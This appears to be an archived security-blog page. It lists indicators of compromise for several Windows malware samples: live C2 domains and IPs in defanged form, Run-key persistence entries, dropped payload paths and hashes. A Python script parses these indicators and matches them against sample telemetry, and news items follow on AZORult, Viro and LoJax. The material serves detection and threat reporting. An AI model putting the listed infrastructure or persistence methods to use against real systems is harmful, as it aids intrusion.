  • 199[.]249[.]223[.]62
  • 185[.]220[.]101[.]12
  • 89[.]27[.]96[.]42
  • 208[.]113[.]131[.]196
Domain Names contacted by malware. Does not indicate maliciousness.
  • dallasmediationlawyer[.]com
  • myexternalip[.]com
Files and or directories created
  • %LocalAppData%\Temp\character.exe
  • %AppData%\mssert\chasactes.exe
  • %LocalAppData%\Temp\const_cast.bat
  • %LocalAppData%\Temp\whzxixx5.jdj.ps1
  • %LocalAppData%\Temp\xgxfy2dc.eju.psm1
  • %LocalAppData%\Temp\21iyllij.ncz.psm1
  • %LocalAppData%\Temp\erifm5li.lo3.ps1
  • %LocalAppData%\Temp\wmez5d0g.r0g.ps1
  • %LocalAppData%\Temp\gs0jrz4i.yd2.psm1
  • %LocalAppData%\Temp\qgh0kqvv.ce5.ps1
  • %LocalAppData%\Temp\tkzdlipn.odo.psm1
File Hashes
  • 0276895b76757b5b2726c1c2fbb50d98040dc2dc46aedff1e5b9709f168b4a8d
  • 0f792637a859a3c2919e1e45a9500e1bdf2b5f4e07bfc4d8b5e24cf7c8003e5e
  • 1114fd2ee387df04c4e7ed0bb6d088b220e893c8a1ee07386977c7369681e5d3
  • 1c2f39f6a608c70b16a79ed4cfb228c412852caac8a8b8bafc4e0819d038aa2c
  • 2ca6d57dcfacd0f59f8b390ccbf138b557b8e95a157a53de6fe864c5eafbcf80
  • 4682a95f9ed32657ee61b7aec758ab6bbdc17a52e2812e1372b3b2a9776cadc1
  • 655f60c338658334723310c79033b26daa207b61fd89ebaf4abbed93802c65be
  • 672aac7a017a8417608dfe687fa4023fdd1e90a7d77f6e1d9b035a070c9d9c40
  • 6ff12e83f44e19de6515c03108fccfd98abd3a70bbab1088171954a3c6113d3b
  • a407d2cfb849a1822895fb5770db7c24b707422da3a193e7d8f5d9e39bfb3896
  • ccbac43307cd046f896283deac0341351b5dc83e6be5cb2292a0c28cdfd34650
  • dafd70b7b82551b0feb905f8d466d2b02784ce6e5d5c2b8d6d00e82b27487ae0
  • dbf3533e970aacc291d0342289943605537407df18217182ca39d52a8c9f8970

Coverage: detection table and screenshots (AMP, ThreatGrid, Umbrella) not reproduced in this archive.

Win.Dropper.Fqdq-6705253-0


Indicators of Compromise


Registry Keys
  • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • Value Name: LanguageList
  • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
    • Value Name: PnpInstanceID
Mutexes
  • 3749282D282E1E80C56CAE5A
IP Addresses contacted by malware. Does not indicate maliciousness.
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness.
  • baxishop[.]ro
Files and or directories created
  • %AppData%\D282E1\1E80C5.lck
  • %AllUsersProfile%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol
  • \PC*\MAILSLOT\NET\NETLOGON
  • \lsass
  • %AppData%\D282E1
  • \samr
File Hashes
  • 030290f026a913226735bc017a37997180f130b9ce1fdc3b990e050aea4bc39e
  • 07abd686b7cda16b61c65d82cb72f464e2ea31bb8bb165f01bbcfa693f1bd22a
  • 1258790e008879340d7cd8e6b303e25183345a05d81b6583164f0a690323405b
  • 12963b31f9719d9333f6cbdb46426c32179bba4a31976b094d192588eb4439ff
  • 2627bd09fd4886f83a7ca589518523606b581ad026968f3d013e1cfb221f7811
  • 2c18a46ea35314f065b21e151d37787cfa5b7696207226ca80f7732176659ee9
  • 30a901d40309ac1e42e98ad59044e1e1f97f985ca397628e8f0deb8f67f39d1f
  • 31ef4c98208464b43dd337b92cba0cfa05d0924ebc732e0b1ee88120495f503c
  • 34f159a5b3ee64cbe520c18e9abd66be61b583dad385bbec9cadf054942827da
  • 35c1410cfb084bb4f4ef5a7c3d92c7b78ddd33849864e41f22e09f5b1c3997b2
  • 3a69eddc3ab09e947703dbfd7e279e9e6e867190c9f72f395833fe94a1b6903a
  • 4688f04b2498695705ea718ba724e9f0c04d92d09d75505f7fa1b1ad19bfe795
  • 4e79a2473921ee6132c3e73f9b4de0395ec350cb476981cf2cb19171034f9405
  • 56979370107aeffca2fa5ad915f454e33ced1a5c6518dbc01ed15689b92e83dd
  • 582f2175b65814e7558fca9ebc7e1a6f97402ce3079f43ece47fdc17c3f7324e
  • 5f83ff3b7d094547fd00dacabe669e389bdd04af09dcbc7790f29a63f797a00f
  • 6448bc9787a96f76cc6716294a204df6d1cbd6db9cc441abc78b31161529e00f
  • 7a2868174590c11d2f95794260792700a1fd567b5315702decfd1cd6611ed0d5
  • 8b7a4bc0f2ea0f3e54b0cea9fa2928ddd0a85aa80a64071985cf95301c0d5ac3
  • 9030a6efd1e15d5e78b727700863ab45b667a7c532761b3a148aa222f7e17b87
  • 946de8d2685ded47c74e4b7c9490e8961598462a87be7ca5bef22693745f7cfa
  • 951860ee7f7283a3b238cbfdb6e161c09fcb6a2b7975bb142412c442fd2590fd
  • 95b99dd7dd7814724287c89e2435aa65cc82e91c5aabd453be1a0532d50bd936
  • 96397b26ba4ee4244704c2cadd71c3d3d4c12e988f6de1d695f3602432bd94b3
  • 9c5acd9297928707ed7e472e9316b125b55b2cd98870aaa4b4630dcd0fece734

Coverage: detection table and screenshots (AMP, ThreatGrid) not reproduced in this archive.

Win.Malware.Genkryptik-6704925-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS
    • Value Name: DhcpNameServer
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNameServer
Mutexes
  • !IECompat!Mutex
  • !PrivacIE!SharedMem!Mutex
  • Local\VERMGMTBlockListFileMutex
  • Local\!BrowserEmulation!SharedMemory!Mutex
  • Local\URLBLOCK_DOWNLOAD_MUTEX
  • Local\URLBLOCK_HASHFILESWITCH_MUTEX
  • {5312EE61-79E3-4A24-BFE1-132B85B23C3A}
  • {66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}
  • IsoScope_1e0_ConnHashTable<480>_HashTable_Mutex
  • IsoScope_1e0_IESQMMUTEX_0_303
  • IsoScope_1e0_IESQMMUTEX_0_331
  • IsoScope_1e0_IESQMMUTEX_0_274
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_480
  • IsoScope_708_ConnHashTable<1800>_HashTable_Mutex
  • IsoScope_708_IESQMMUTEX_0_303
  • IsoScope_708_IESQMMUTEX_0_331
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_1800
  • IsoScope_708_IESQMMUTEX_0_274
  • IsoScope_4b4_IESQMMUTEX_0_274
  • IsoScope_f8_IESQMMUTEX_0_274
  • IsoScope_20c_ConnHashTable<524>_HashTable_Mutex
  • IsoScope_20c_IESQMMUTEX_0_303
  • IsoScope_20c_IESQMMUTEX_0_331
  • IsoScope_4b4_ConnHashTable<1204>_HashTable_Mutex
  • IsoScope_4b4_IESQMMUTEX_0_303
  • IsoScope_4b4_IESQMMUTEX_0_331
  • IsoScope_20c_IESQMMUTEX_0_274
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_524
  • IsoScope_f8_ConnHashTable<248>_HashTable_Mutex
  • IsoScope_f8_IESQMMUTEX_0_303
  • IsoScope_f8_IESQMMUTEX_0_331
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_248
  • IsoScope_6e4_IESQMMUTEX_0_274
  • IsoScope_6e4_ConnHashTable<1764>_HashTable_Mutex
  • IsoScope_6e4_IESQMMUTEX_0_303
  • IsoScope_6e4_IESQMMUTEX_0_331
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_1764
  • IsoScope_4e8_IESQMMUTEX_0_274
  • IsoScope_4e8_ConnHashTable<1256>_HashTable_Mutex
  • IsoScope_4e8_IESQMMUTEX_0_303
  • IsoScope_4e8_IESQMMUTEX_0_331
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_1256
IP Addresses contacted by malware. Does not indicate maliciousness
  • 13[.]107[.]21[.]200
Domain Names contacted by malware. Does not indicate maliciousness
  • ryiwuehwskosuqhs[.]com
  • goldenmemb[.]website
  • dolikulooospo[.]fun
Files and or directories created
  • %LocalAppData%Low\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
  • %LocalAppData%\Microsoft\Windows\WebCache\V01tmp.log
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\dnserror[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\httpErrorPagesScripts[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\errorPageStrings[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\httpErrorPagesScripts[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\NewErrorPageTemplate[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\errorPageStrings[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\NewErrorPageTemplate[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\dnserror[1]
  • %LocalAppData%\Microsoft\Windows\WebCache\V010000F.log
  • %LocalAppData%\Temp\~DF4B1ABF6D6A9DC6E3.TMP
  • %LocalAppData%\Temp\~DF88BBAB8557CDD7E3.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\errorPageStrings[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\suggestions[2].en-US
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\NewErrorPageTemplate[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\dnserror[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\favicon[2].ico
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\favicon[1].png
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\favicon[2].png
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\views[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\favicon[1].ico
  • %LocalAppData%\Temp\~DFDEB0FC636A1346E9.TMP
  • %LocalAppData%\Temp\~DFEBFBFB87C6F7EC1B.TMP
  • %LocalAppData%\Temp\~DFFC172A87F8554CB4.TMP
  • %LocalAppData%\Temp\~DF81A97BC70E347BD0.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\httpErrorPagesScripts[1]
  • %LocalAppData%\Temp\~DF8AA772D245BBB59D.TMP
  • %LocalAppData%\Temp\~DF90B11BDCE6092786.TMP
  • %LocalAppData%\Temp\~DF9FFAF3D7E7318657.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\NewErrorPageTemplate[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\httpErrorPagesScripts[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\NewErrorPageTemplate[2]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\dnserror[2]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\errorPageStrings[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\errorPageStrings[2]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\httpErrorPagesScripts[2]
  • %LocalAppData%\Temp\~DF5DDD3B43947F7CEA.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\dnserror[1]
  • %LocalAppData%\Temp\~DFB15BBE1A2AFF7D7E.TMP
  • %LocalAppData%\Temp\~DF1D30A03829232972.TMP
  • %LocalAppData%\Temp\~DF38E2C66D6383AD19.TMP
  • %LocalAppData%\Temp\~DFCE77235CFE7E5202.TMP
File Hashes
  • 060707050140235807d6e6ac6933fa26cf0c230d68f574b880e99a699bdf506a
  • 088a6e8da14dbeab941702b1515b85486544dffc83885112b95997257f8d32d5
  • 0dfc771e0fbdf05facc54643341dfce97b745efe13867b01049bc977624d14b2
  • 0e21eb1c5f15689329bc6d46d78eb7d0f4eccc6fb8da4f41d17e6205ae7a847b
  • 0f71ba5f0fbba5d9810a4f816c5ebe1d545c4c65b34c180c769c2cd3467b0737
  • 130649d3f09197d1c2e895cc06fd9ecd6feb2e663562a6b99d95ae4ce66eddb8
  • 139ac3f5d2e5351c0edcd0edb384d0a75e482e8007724f181c7a4204f5895ad9
  • 13c3313b910f18431ea183b00632deacd266561a73bcf837f4b46f1f73b31bcd
  • 24b6c693551ed33b55d7ce6baae96dcca9e3cb55e9b94637d5ba59edc109d402
  • 27cec90ae8c84a79dd2ebb2928152bdea1b07cab3b2f1ad98ed8fb3f17cc339b
  • 28b54e5cf1be89766c177bc7f4c8692abec0bb4bdf299a59709d10120f7bc205
  • 29b845365404070e98840dcd74eb3c23919b0990b14bd0905b0921220f8b4bb9
  • 2c3fad4307c0739c336e50ec670b61d00029d2a2be260676419f883835ce8818
  • 337ad107eb3e1fc497af4b3f6006e12ae74a55d6535f28a67c9b231807e15f24
  • 3394d5ec6ba4c548289008cbfea8238318af52d51e8e2110b5060635425db74c
  • 378a4e27208c7fee9c7ac33d11d8872db902fe5242aceabba11343bf11a95155
  • 3a136b2b6df645c3e6b3c0febb821a5dda5bcb4bd35f674fb33aa10684b58004
  • 3c4e171d1f0b29b6f40f8bdf6af0c1161b092591c453c66734f4c6f54a0ac36f
  • 3ec415b8f411c2004892c7dedcd25e4683d0f0fded754c8b9a0f784f087dddcf
  • 420c05993a014331992918e89dda914851c0e31a2e196446309e3da07dc0c31a
  • 43d9e51c98400b09bc499f0e2857e2b797254167c29c9d2234f6506d7cf7f98e
  • 4ae9179659e2ba267b87478ea0f48c6c1caba252b4d2bcdfdc4b6ba873028d87
  • 542b5b23123a0a71d79181adeda4edfff6b91cdaf0068aafc55ee03bdc928ab5
  • 5bbc6d14ed5d408d0c7bb115853dff092c236517223c14b92c709a7ffa2c5742
  • 5cc63a68be8b7ea9feca940e7b038ebca417f421a0b70c17d3e6ebfca4212e16

Coverage: detection table and screenshots (AMP, ThreatGrid, Umbrella) not reproduced in this archive.

Win.Malware.Zusy-6704537-0


Indicators of Compromise


Registry Keys
  • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • Value Name: LanguageList
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
  • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
    • Value Name: PnpInstanceID
  • <HKCU>\Software\Microsoft\RAS AutoDial
Mutexes
  • DBWinMutex
  • NtHack
IP Addresses contacted by malware. Does not indicate maliciousness
  • 139[.]196[.]204[.]190
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]bilibili[.]com
  • wpa[.]qq[.]com
  • bbs[.]nt47[.]com
  • www[.]nt47[.]com
Files and or directories created
  • N/A
File Hashes
  • 00b657fa1270930f868fcd06c38af4b1514baa727c0db576e50340cc2f1c49dc
  • 0f6f850198e9afb8ddfe5552dad5ae6151c3cdf41f5ed8964a1e46ce62ea0d2b
  • 1bf8402a3da8797a130c528ff38fcca42403a5e878943d8dbaec420433c55edf
  • 2c0996f013b00833a28d1612acc545a66264b613e7127738ccf3536ddb04501c
  • 41cd6b708c56e1bad9b185ab09de02efd1f57d7c6691a9910d00b18489e59ec7
  • 4733b5c290c00ca10bc72c248d6a014c6bf5fe21b92592b941cfdd8ac6870610
  • 55099d0d5b7f5f677e431ebaf4c9a71877ab7b10887cb027ac78540ba1631779
  • 680e98f78b16e05b2f55e1432f8553341cfd02ece47cedca652a04e1f4c901cf
  • 6f496ef1284e79d93693374672e416d46b55c6590f8ab7737303b12f7316c2dd
  • 9085e78cbbf63b30c42a4801cee1b67fa41f4c4308d0f163c3d39d7f76c00bf8
  • 98e0df2e9cf8ba02d05cdc1bdea0cccc861855197f2a009f4a8fed152770b499
  • c19b9d8770e3619d832401aa7bc385bbf7e239d0397febbb441621efbb539f72
  • cca199364abfb50ec1dd467035fd2c637056abac9f8351393111dcdce8243e38
  • d346a3d9a4be88b2e6fe2b78b391efa47d4de3c9acb23aeb31c0b0e1868d9817
  • da9e5e6a5379284ca1b4e9be680bbecdcbca2378d8d8ae9e76e5601ba4fd9dcc
  • eba22d087a40a79daa58a95e6337f53cf98885400019ad9e8417bb4ce2f2c8ea

Coverage: detection table and screenshots (AMP, ThreatGrid) not reproduced in this archive.

Win.Malware.Razy-6703914-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: internat.exe
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: system
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{4LW407K6-M06A-64Y6-80K0-13CK6KK8U041}
    • Value Name: StubPath
Mutexes
  • -
IP Addresses contacted by malware. Does not indicate maliciousness
  • 217[.]12[.]210[.]23
  • 82[.]205[.]63[.]221
Domain Names contacted by malware. Does not indicate maliciousness
  • extreme33[.]dns1[.]us
  • mdformo[.]ddns[.]net
  • mdformo1[.]ddns[.]net
Files and or directories created
  • N/A
File Hashes

Coverage

Screenshots of Detection (AMP, ThreatGrid, Umbrella)


Doc.Malware.Emooodldr-6699885-0


Indicators of Compromise


Registry Keys
  • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • Value Name: LanguageList
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Canon PIXMA MG2520\PrinterDriverData
Mutexes
  • Global\552FFA80-3393-423d-8671-7BA046BB5906
  • Local\ZonesCacheCounterMutex
  • Local\ZonesLockedCacheCounterMutex
  • Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2580483871-590521980-3826313501-500
  • Global\MTX_MSO_AdHoc1_S-1-5-21-2580483871-590521980-3826313501-500
  • Global\MTX_MSO_Formal1_S-1-5-21-2580483871-590521980-3826313501-500
  • Local\10MU_ACB10_S-1-5-5-0-57527
  • Local\10MU_ACBPIDS_S-1-5-5-0-57527
  • Local\WinSpl64To32Mutex_e162_0_3000
  • Local\MSCTF.Asm.MutexDefault1
IP Addresses contacted by malware. Does not indicate maliciousness.
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness.
  • q0fpkblizxfe1l[.]com
Files and/or directories created
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B106E8EE-597B-49CA-A6A4-5BA8ABCC8F6A}.tmp
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43E9ADDD-30D5-47E4-98B0-7E3A5536CACC}.tmp
  • %UserProfile%\Documents\20180928
  • %UserProfile%\924.exe
  • %SystemDrive%\TEMP\~$8241024f69edc258237f01170ea088fd5064c5908267e943f97bc9e2a6ea1d.doc
  • %LocalAppData%\Temp\CVR41E8.tmp
  • %LocalAppData%\Temp\~DFD053DCDB50AFFE51.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0EF83731-611B-4C55-980D-4D5CFC5BF353}.tmp
  • %AppData%\Microsoft\Office\Recent\5f8241024f69edc258237f01170ea088fd5064c5908267e943f97bc9e2a6ea1d.LNK
  • \TEMP\~$8241024f69edc258237f01170ea088fd5064c5908267e943f97bc9e2a6ea1d.doc
  • %LocalAppData%\Temp\bdmwft0z.slp.ps1
  • %LocalAppData%\Temp\tjkn23yi.53a.psm1
  • %UserProfile%\Documents\20180928\PowerShell_transcript.PC.ceUgAgR5.20180928074741.txt
File Hashes
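The IoC blocks above (registry keys with value names, defanged IPs and domains, created files) all use one list layout. As an added example, not Talos or Cisco code, the Python below parses that layout, refangs the indicators, and checks them against constructed Sysmon-style telemetry lines; the event line format and the suffix matching of `%Var%`-prefixed paths are assumptions of this example.

```python
"""Parser for the Talos-style IoC blocks listed on this page, plus a matcher
that runs the indicators over constructed Sysmon-style telemetry lines.
Added example for this page; not Talos or Cisco code."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed excerpt in the page's own list layout; the values come from the
# Win.Malware.Razy and Doc.Malware.Emooodldr sections above.
IOC_TEXT = r"""Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: internat.exe
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{4LW407K6-M06A-64Y6-80K0-13CK6KK8U041}
    • Value Name: StubPath
Mutexes
  • -
IP Addresses contacted by malware. Does not indicate maliciousness.
  • 217[.]12[.]210[.]23
Domain Names contacted by malware. Does not indicate maliciousness.
  • mdformo[.]ddns[.]net
Files and or directories created
  • %UserProfile%\924.exe
  • %LocalAppData%\Temp\bdmwft0z.slp.ps1
"""

# Section header prefix -> bucket name ("File Hashes" must precede "Files").
SECTIONS = [("Registry Keys", "registry"), ("Mutexes", "mutexes"),
            ("IP Addresses", "ips"), ("Domain Names", "domains"),
            ("File Hashes", "hashes"), ("Files", "files")]


def refang(value: str) -> str:
    """Undo the page's defanging: 217[.]12[.]210[.]23 -> 217.12.210.23."""
    return value.replace("[.]", ".")


def parse_ioc_block(text: str) -> Dict[str, list]:
    iocs: Dict[str, list] = {name: [] for _, name in SECTIONS}
    section: Optional[str] = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw.startswith(" "):  # unindented line = section header
            section = next((n for p, n in SECTIONS if raw.startswith(p)), None)
            continue
        item = raw.strip().lstrip("•").strip()
        if section is None or item in ("-", "N/A"):  # empty sections
            continue
        if section == "registry":
            if item.startswith("Value Name:"):
                # sub-bullet: attach the value name to the preceding key
                key, _ = iocs["registry"][-1]
                iocs["registry"][-1] = (key, item.split(":", 1)[1].strip())
            else:
                # "<HKCU>\SOFTWARE\..." -> "HKCU\SOFTWARE\..." (no value yet)
                iocs["registry"].append((re.sub(r"^<(\w+)>", r"\1", item), None))
        elif section in ("ips", "domains"):
            iocs[section].append(refang(item).lower())
        else:
            iocs[section].append(item)
    return iocs


def registry_ref(key: str, value: Optional[str]) -> str:
    """Full registry path as telemetry reports it, upper-cased for comparison."""
    return (key if value is None else f"{key}\\{value}").upper()


# Constructed telemetry lines ("<EventType> <Field>: <Value>"); the layout is an
# assumption of this example, loosely modelled on Sysmon event fields.
EVENTS = [
    r"RegistryValueSet TargetObject: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe",
    r"RegistryValueSet TargetObject: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
    r"DnsQuery QueryName: mdformo.ddns.net",
    r"DnsQuery QueryName: update.microsoft.com",
    r"NetworkConnect DestinationIp: 217.12.210.23",
    r"FileCreate TargetFilename: C:\Users\alice\AppData\Local\Temp\bdmwft0z.slp.ps1",
    r"FileCreate TargetFilename: C:\Users\alice\report.docx",
]


def match_events(iocs: Dict[str, list], events: List[str]) -> List[Tuple[str, str]]:
    """Return (matched value, event line) pairs in event order."""
    reg_refs = {registry_ref(k, v) for k, v in iocs["registry"]}
    # %UserProfile%\924.exe -> "\924.exe": match on the path suffix because the
    # expanded prefix varies per host (heuristic; short names can over-match).
    file_suffixes = [re.sub(r"^%[^%]+%", "", f).lower() for f in iocs["files"]]
    hits: List[Tuple[str, str]] = []
    for ev in events:
        kind, _, rest = ev.partition(" ")
        _field, _, val = rest.partition(": ")
        if kind == "RegistryValueSet" and val.upper() in reg_refs:
            hits.append((val, ev))
        elif kind == "DnsQuery" and val.lower() in iocs["domains"]:
            hits.append((val, ev))
        elif kind == "NetworkConnect" and val in iocs["ips"]:
            hits.append((val, ev))
        elif kind == "FileCreate" and any(val.lower().endswith(s) for s in file_suffixes):
            hits.append((val, ev))
    return hits


if __name__ == "__main__":
    for indicator, line in match_events(parse_ioc_block(IOC_TEXT), EVENTS):
        print(f"HIT {indicator}\n    {line}")
```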

Coverage

Screenshots of Detection (AMP, ThreatGrid, Umbrella)


Gazorp Malware Builder Offers Free, Customized AZORult Attacks on the Dark Web

Gazorp, a free malware builder spotted on the dark web, lets would-be threat actors create customized AZORult attacks.

First discovered by Check Point Research on Sept. 17, the new builder makes it easy to generate custom samples of the AZORult infostealer. According to Gazorp’s creators, developing malware with the tool is “as simple as 2×2”: Prospective users provide their command-and-control (C&C) address, download the malware builder, install the panel and deploy their new creation in the wild.

Gazorp builds samples of AZORult version 3.0, which was released five months ago. Since that time, two newer versions — 3.1 and 3.2 — have been released, limiting the efficacy of Gazorp’s version. As Check Point made clear, however, the outdated version has “multiple stealing capabilities which can be leveraged by any actor to gather victim information and misuse it.”

Gazorp’s Expanding Threat Capabilities

Gazorp’s authors have added several new panel features and code upgrades to boost the impact of their AZORult version. Notable improvements include the addition of a global heat map that provides country-by-country statistics and the ability to create a complex mutex based on multiple factors, including admin, user, system and guest authorities. In addition, this Gazorp version includes vulnerability and bug fixes to version 3.0, along with visual user interface (UI) enhancements.

But that’s not all. The malware builder also includes a Telegram channel link that features the ongoing work of Gazorp’s authors. Users who visit the channel can get updates on new features, add their own suggestions and donate bitcoin to help drive future improvements. The creators made it clear: “More donations, more updates.” According to Check Point, it appears the project will evolve over time and “possibly produce new variants for AZORult.”

How to Protect Enterprise Data From a Malware Builder

Tackling the problem of custom malware code starts with consistent patching. Security experts note that “the bulk of security issues simply come down to software patching,” and this is certainly the case with Gazorp. Given its use of outdated AZORult code, regular security patching will frustrate most free-to-play malware attackers.

Security teams should also consider investing in security-as-a-service (SECaaS) solutions. Check Point noted that new Gazorp attacks may begin to emerge at a higher scale as more attackers discover the service. Attempting to track evolving, emerging infections without the benefit of on-demand security resources quickly becomes an exercise in frustration — and could lead to network compromise.

Source: Check Point Research

The post Gazorp Malware Builder Offers Free, Customized AZORult Attacks on the Dark Web appeared first on Security Intelligence.

China accused of sabotaging thousands of servers at major US companies with tiny microchips hidden on motherboards

An extraordinary report released by Bloomberg BusinessWeek claims that China has been exploiting the supply chain, planting a tiny microchip on servers that ended up in the server rooms of almost 30 companies, including the likes of Apple and Amazon.

Viro Botnet Uses Spamming and Keylogging Capabilities to Spread Ransomware

Security researchers observed a new attack campaign in which the Viro botnet infects devices with ransomware and then uses those compromised machines to infect more victims.

Once downloaded, according to Trend Micro, Viro quickly generates encryption and decryption keys with a random number generator after scanning the infected device for the right registry. Interestingly, although the botnet is aimed primarily at Americans, the attack displays a ransom note in French after successfully encrypting files using RSA.

Viro first made headlines when it was discovered in the wild in late 2017.

Viro’s Expanded Spamming and Keylogging Capabilities

While early examples of ransomware simply held data hostage until victims paid up, the recent Viro attacks involve additional capabilities, such as penetrating users’ email systems and contact lists to spam other potential victims.

Its keylogging capabilities, meanwhile, allow cybercriminals to harvest other data, which is then sent back to a command-and-control (C&C) server that can instruct the bot to download additional malware or other files. The researchers speculated that Viro may be based on a variant of Locky, which made headlines throughout 2017.

On the plus side, the researchers noted that Viro’s C&C server had been taken down since they first observed the attacks — meaning it will no longer be able to encrypt files even if it lands on a victim’s machine.

How to Avoid Botnet-Borne Ransomware Attacks

Ransomware attacks like Viro often start when someone innocently clicks on an email attachment that triggers the download process. IBM experts advise security teams to restrict the execution of programs from temporary folders where malware files commonly reside. This is usually just a matter of leveraging common Software Restriction Policies (SRPs) and Group Policy Objects (GPOs) that are already available within security tools, which would block attempts by cybercriminals to copy malicious payloads from a temporary folder.

Threat actors may also aim ransomware at AppData or Local AppData folders. Organizations can keep ransomware at bay by turning off the ability to launch executables in these areas.

Source: Trend Micro

The post Viro Botnet Uses Spamming and Keylogging Capabilities to Spread Ransomware appeared first on Security Intelligence.

Sednit APT Group Uses First UEFI Rootkit Detected in the Wild to Execute LoJax Malware

For the first time ever, researchers discovered a Unified Extensible Firmware Interface (UEFI) rootkit in the wild that they believe the Sednit advanced persistent threat (APT) group used to execute LoJax malware.

Researchers at ESET observed an attack campaign distributing LoJax and three types of tools. The first component dumped system information into a text file. The second tool read the contents of the Serial Peripheral Interface (SPI) flash memory to save an image of the system’s firmware. The third wrote a UEFI module to the SPI flash memory and installed a UEFI rootkit that’s responsible for dropping LoJax onto the machine.

All Signs Point to Sednit

LoJax is a Trojanized version of LoJack, antitheft software that uses a UEFI and Basic Input/Output System (BIOS) module to help it resist operating system (OS) reinstallations and hard drive replacements. LoJax uses this same persistence method but calls out to a malicious command-and-control (C&C) server.

ESET recognized some of the domains used by LoJax as those employed by SedUploader, the first-stage backdoor of Sednit. This discovery, along with other evidence, led ESET to attribute the campaign and UEFI rootkit to the APT group.

The UEFI rootkit used to distribute LoJax may be the first of its kind discovered in the wild, but researchers have uncovered others like it outside of active attack campaigns. Back in 2015, McAfee found a UEFI-based rootkit in the Hacking Team data breach. Individuals have also disclosed proof-of-concept UEFI rootkits on YouTube.

